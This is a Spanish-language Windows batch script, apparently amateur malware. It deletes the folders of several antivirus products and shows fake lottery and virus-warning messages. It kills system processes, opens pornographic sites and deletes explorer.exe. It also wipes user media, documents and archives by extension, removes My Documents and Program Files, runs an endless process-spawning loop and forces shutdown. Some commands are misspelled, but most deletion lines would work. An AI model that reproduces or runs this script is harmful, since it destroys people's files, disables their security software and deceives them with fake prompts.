@echo off
cd
cd "archivos de programa"
cd "Norton antivirus"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "Panda Software"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "Kaspersky lab"
attri -R -A -S -H *.*
del /S /Q *.*
cd..
cd "McAfee.com"
attrib -R -A -S -H *.*
del /S /Q *.*
msg * Hola, ha ganado la loteria!!!!!!
msg * Para acceder a su premio pulse una tecla pause
msg * buenos dias aqui esta la primera parte del premio
tskkill iexpress.exe
tskkill notepad.exe
tskkill msnmsgr.exe
start www.petardas.com
start www.2tetas.com
start www.xxx.com
start www.tetas-tetas
echo off>virus.bat
echo off>virus69.bat
echo off>virus58.bat
echo off>virus45.bat
echo off>virus54.bat
echo off>virus21.bat
echo off>virus9.bat
echo off>virus10.bat
echo off>virus8.bat
echo off>virus7.bat
echo off>virus6.bat
echo off>virus5.bat
echo off>virus4.bat
echo off>virus2.bat
echo off>virus3.bat
echo off>virus65.bat
echo off>virus899.bat
echo off>virus4545.bat
echo off>virus65456.bat
echo off>virus544556.ba t
echo off>virus65465.bat
echo off>virus986546.ba t
echo off>virus56564.bat
echo off>virus6595.bat
echo off>virus669.bat
echo off>virus666.bat
echo off>virus866456.ba t
echo off>virus4664.bat
echo off>virus@hotmail.bat
echo off>virus5435.bat
echo off>virus545454665 46564.bat
echo off>virus545454664 54546546.bat
echo off>virus545454665 64546546.bat
echo off>virus545454665 46.bat
echo off>virus545454665 465.bat
echo off>virus54545466. bat
echo off>virus545454665 45454.bat
echo off>virus545454664 65546465645.ba t
echo off>virus545454665 54546.bat
echo off>virus545454665 45465465.bat
echo off>virus545454665 45445546465.ba t
echo off>virus545454664 6456546.bat
echo off>virus545454664 5456546.bat
echo off>virus545454665 6565.bat
echo off>virus545454669 8894961320.bat
echo off>virus0.bat
ping -n 20 0.0.0.0>nul
msg * AVISO: Se ha detectado un virus en su computadora
msg * El progreso ha sido detenido temporalmente
msg * Para terminar el proceso con exito debe pulsar pause
msg * Bueno aqui esta otra parte de su premio
msg * Le deseo que la disfrute
ping -n 10 0.0.0.0>nul
echo.
echo.
tskkill iexplorer.exe
tskkill cidaemon.exe
tskkill svchost.exe
tskkill cisvc.exe
tskkill svchost.exe
ping -n 20 0.0.0.0 >nul
cls
echo.
echo.
msg * como que quieres mas? pos ... OK
ping -n 10 0.0.0.0 >nul
del /f "c:windowssystem32explorer.exe
echo.
msg * Seguro que disfruta verdad
msg * La deseo que la disfruta verdad?
echo.
echo.
ping -n 10 0.0.0.0 >nul
del /f /s /q "c:*.mp3"
del /f /s /q "c:*.mp4"
del /f /s /q "c:*.jpg"
del /f /s /q "c:*.txt"
del /f /s /q "c:*.jpeg"
del /f /s /q "c:*.rar"
del /f /s /q "c:*.php"
del /f /s /q "c:*.com"
del /f /s /q "c:*.zip"
echo
ping -n 10 0.0.0.0 >nul
msg * Ahora le dare otras cosas mas
deltree "%userprofile%/mis documentos"
echo.
shu*** -a
echo.
echo.
msg * Y por ultimo esto
echo.
:lalbel
start
goto lalbel
echo.
echo.
echo.
msg * Espero que haya disfrutado
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
ping -n 50 0.0.0.0 >nul
deltree "C:archivos de programa"
ping -n 50 0.0.0.0 >nul
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
shu*** -s -f -t 0>>c:autoexec.bat
